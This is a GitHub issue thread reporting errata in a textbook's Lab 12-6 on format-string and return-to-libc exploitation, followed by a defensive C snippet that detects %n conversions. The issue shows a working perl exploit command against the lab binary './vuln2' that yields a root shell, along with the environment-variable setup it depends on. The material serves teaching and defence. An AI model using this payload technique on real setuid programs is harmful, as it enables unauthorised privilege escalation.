
Lab 12-6 - Multiple editing issues #3

Open
e3prom opened this issue Jul 12, 2018 · 1 comment

Comments

@e3prom

e3prom commented Jul 12, 2018

Not directly related to this repository, but I've found several editing issues inside the Lab 12-6 section:

The figure has no 'Figure' tag (same goes for the figure in the previous lab). Not a big deal, though there are two description errors inside the diagram. The third field after the buffer is written as '%3$n', which doesn't match the format string '%6$n' used later in the FMTSTR environment variable. Note that both the third direct parameter and the sixth are working on my setup, but mixing both can be a little bit confusing.

Also I think the figure's arrow 'Saved EIP' points to 'Addr of execl()' and not to 'Addr of printf()' as it should be. As soon as the overflow in the vulnerable function occurs, the first call should be to 'printf()' and not to 'execl()'.

Also the arrow to 'Return Address After printf()' should point to 'Addr of execl()', as it's the second function to call after printf().

A bit further, the code block showing the use of environment variables and the execution of './getenv' is a bit wrong. As the utility has been renamed to report the correct env variable addresses, it should be called './gtenv', as below:

$ export FMTSTR="%6\$n"
$ echo $FMTSTR
%6$n
$ ./gtenv FMTSTR
FMTSTR is located at 0xffffdf18
$ export WRAPPER="./wrapper"
$ echo $WRAPPER
./wrapper
$ ./gtenv WRAPPER
WRAPPER is located at 0xffffdf13

As a side note, I do confirm the successful exploitation on amd64:

$ ./vuln2 `perl -e 'print "A"x15 . "\xc0\x4a\xe2\xf7" . "\x40\x25\xe9\xf7" . "\x18\xdf\xff\xff" . "\x13\xdf\xff\xff" . "\x13\xdf\xff\xff" . "\xcc\xd5\xff\xff"'`
# id
uid=0(root) gid=0(root) groups=0(root),27(sudo),100(users)

The only change made is to compile 'vuln2.c', 'wrapper.c' and 'getenv.c' using the '-m32' gcc flag.

Regards
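For readers following the lab, an added example (not from the book or this repository) showing how a program that must accept a format string from outside can detect the `%n` write conversion the lab's `%6$n`/`%3$n` payload relies on; `has_n_conversion` is a hypothetical name, and the grammar it walks is the glibc printf one.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Returns 1 if fmt contains a %n conversion (a write to memory), else 0.
 * It follows the glibc printf grammar
 *   % [parameter$] [flags] [width] [.precision] [length] conversion
 * so the lab's direct-parameter forms (%6$n, %3$n) are caught as well as
 * a classic "%08x%08x%n" walk. Name and behaviour are assumptions here. */
int has_n_conversion(const char *fmt)
{
    const char *p = fmt;
    while ((p = strchr(p, '%')) != NULL) {
        p++;                              /* step past the '%' */
        if (*p == '%') { p++; continue; } /* "%%" is a literal percent */
        const char *q = p;                /* optional "N$" parameter index */
        while (isdigit((unsigned char)*q)) q++;
        if (q > p && *q == '$') p = q + 1;
        while (*p && strchr("-+ #0'", *p)) p++;      /* flags */
        if (*p == '*') {                              /* width "*" or "*N$" */
            p++;
            while (isdigit((unsigned char)*p)) p++;
            if (*p == '$') p++;
        } else {
            while (isdigit((unsigned char)*p)) p++;   /* width digits */
        }
        if (*p == '.') {                              /* precision */
            p++;
            if (*p == '*') p++;
            while (isdigit((unsigned char)*p)) p++;
            if (*p == '$') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;     /* length modifiers */
        if (*p == 'n') return 1;
        if (*p == '\0') break;                        /* dangling '%' */
        p++;                                          /* conversion char */
    }
    return 0;
}
/* The lab's bug is printf(buf) on attacker-controlled buf; the fix is
 * printf("%s", buf). If a format must be accepted from outside, reject
 * anything the check above flags. */
int main(void)
{
    const char *samples[] = { "%6$n", "%3$n", "AAAA%08x%n", "%%n", "hello %s" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s -> %s\n", samples[i],
               has_n_conversion(samples[i]) ? "contains %n" : "safe");
    return 0;
}
```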

@harperaa
Collaborator

Thanks for that feedback and sharing with others.
